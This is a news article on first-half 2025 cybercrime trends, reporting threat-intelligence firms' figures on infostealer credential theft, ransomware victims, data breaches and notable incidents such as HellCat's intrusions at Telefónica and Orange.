Cybercrime
,
Fraud Management & Cybercrime
,
Ransomware
Researchers See ‘Acceleration’ in Existing Threats, Ongoing Criminal Success
Cybercrime so far this year can be summarized as featuring “more of everything,” with researchers tracking increases in the number of ransomware and data breach victims, credentials stolen by infostealers, and new vulnerability disclosures with exploits coming to light.
See Also: Top 10 Technical Predictions for 2025
The year so far has been a story of “an alarming acceleration in cyber threats,” said Ian Gray, vice president of cyber threat intelligence operations at Flashpoint. “We’ve seen an 800% increase in credential theft via information-stealing malware, making ‘identity’ a dominant attack vector,” he said. “With ransomware up 179% and data breaches surging 235%, the sheer scale of malicious activity is undeniable.”
The firm’s research, based on the first half of this year, also counted more than 20,000 new vulnerabilities coming to light, of which nearly 7,000 have publicly available exploits. “These trends combined pose a significant challenge to security teams, who must triage growing volumes of vulnerabilities, while attackers meticulously seek to weaponize exploit code,” says a Thursday report from Flashpoint.
The firm’s findings aren’t an outlier, including on the data breach front. The Identity Theft Resource Center, a U.S. non-profit organization that assists breach victims, recently counted 1,732 total data breach incidents, affecting nearly 166 million individuals, in the first half of this year. Comparing that timeframe to the first half of 2024, the quantity of reported U.S. data breaches has increased by 10%. If that trend holds until year’s end, 2025 will set a record for the number of known-breached organizations.
Infostealers Surge
Experts said at least some of those breaches trace to the rising success of infostealers. A new report from threat intelligence firm Kela says that in the first half of this year, 2.7 million systems were infected by infostealers, leading to 204 million compromised credentials flooding the market. If those levels continue, 2025 is set to surpass the scale of infostealers seen in 2024, which involved more than 4.3 million systems being infected and 330 million credentials compromised.
Attackers continue to refine their tactics for tricking victims into installing infostealers, lately including via AI-generated videos posted to TikTok, using “paste and run” tactics, aka ClickFix or ClearFake attacks, which purport to identify both a problem and a solution, which oftentimes involves pasting attacker-provided code into a Windows terminal session (see: Infostealer Attackers Deploy AI-Generated Videos on TikTok).
One challenge with infostealer infections is that they’re designed to harvest whatever sensitive data they might find on a system – cryptocurrency wallet addresses, access credentials for corporate systems and bank accounts, credit card data, cookies, passwords and more.
A thriving ecosystem exists to connect sellers of this stolen information with buyers. Data from each system typically gets batched up as a “log” and sold on automated clouds of logs marketplaces, forums and Telegram channels. Because this malware harvests in part corporate credentials, “infostealers serve as precursors to advanced attacks, including ransomware and espionage,” Kela said. In other words, log buyers include nation-state hackers and extortionists.
Notable incidents this year involving attackers using credentials harvested by infostealers to gain initial access to a network affected the likes of Spanish telecommunications giant Telefónica and French telecom giant Orange, both of which were hit by the HellCat respectively in January and February, Kela said.
“At Telefónica, HellCat compromised 15 Jira accounts, exfiltrating 24,000 employee records, 500,000 Jira tickets and over 2 GB of internal documents,” Kela said. “Six weeks later, HellCat gained month-long access to Orange via Raccoon-Stealer credentials, stealing 12,000 files (6.5 gigabytes) including financial, HR and network data. They also altered RIPE entries through an MFA-lacking ‘ripeadmin’ account, leaking thousands of documents,” it said, referring to the RIPE NCC not-for-profit regional internet registry for Europe, the Middle East and parts of Central Asia.
In March, brand-new Arkana ransomware group claimed to breach Colorado-based internet service provider WideOpenWest, aka WOW, and threatened to leak stolen information pertaining to over 400,000 subscribers unless WOW paid a ransom. “This attack stemmed from an infostealer compromising a WOW workstation in September 2024, which siphoned browser credentials,” Kela said.
Infostealer infections are a global problem. In the first half of this year, the top 10 countries from which victims hail, based on the quantity of uploaded logs, are India, the United States, Brazil, Indonesia and Pakistan, Flashpoint said.
Many infostealer users rent the software for $400 or less per month from one of at least 30 different service providers. In the first half of this year, Flashpoint said the most used infostealer in the first half of this year was Lumma, which it tied to 5 million infected hosts and devices, distantly followed by RedLine, StealC, Vidar and Agenta Tesla, each with 329,000 or fewer infected hosts.
Infostealer-as-a-service providers’ terms and conditions often give them the right to keep any especially lucrative data, such as access credentials for cryptocurrency wallets or accounts.
Ransomware Counts More Victims
Ransomware attacks also appear to be trending upwards. That comes despite ongoing law enforcement disruptions of top groups and overall trust and stability issues. “Q2 has seen plenty of infighting between prominent and up-and-coming threat actors, claims of rivals uniting and major players hit by arrests,” said Chris Boyd, a threat researcher at Rapid7, in a recent report. “It makes sense, then, that affiliates would be in a state of flux, moving from one RaaS group to another, or even holding off altogether until the dust settles.”
Major players in recent months include Scattered Spider, which has socially engineered many name brands, including retailers and insurers, as well as Dragonforce, and healthcare-hacking-happy Qilin, Boyd said (see: Ransomware Thrives in Shook-Up Criminal Underworld).
In the first half of 2025, Kela counted 3,662 ransomware victims either via public reports or claims posted to ransomware group’s data-leak blogs. Of those victims, more than half are U.S.-based. The six month total is already 70% of the count of 5,230 ransomware victims claimed by groups in 2024, meaning the number of known ransomware victims looks set to exceed previous infection levels.
Flashpoint likewise found that the United States remains far and away the country most targeted by ransomware, based on known victims, accounting for what it said were 2,160 claimed victims in the first half of this year, followed by Canada with 249, Germany with 154, the United Kingdom with 148 and Italy with 96.
The ransomware victim count and demographics aren’t definitive, as groups only list a subset of nonpaying victims, sometimes list victims months later, and sometimes lie.
Security experts do keep track of their claims, to help measure the extent to which organizations have been hit by ransomware, which remains very difficult to fully quantify.
Based on what security experts can glean, “the scale of hidden activity remains significant,” with perhaps only one-fifth of all such attacks ever getting reported, said cybersecurity firm BlackFog in a Tuesday report.
Attacks that have come from Jan. 1 through July 31 reveal the damage each one can do to victims. “Among attacks where data theft details were available, the average volume of data exfiltrated was 858 gigabytes,” Flashpoint said. “This figure is based on 609 incidents where leak site posts included specific volume information. Ransom demands were disclosed in 44 cases, with the average demand exceeding $676,000.”
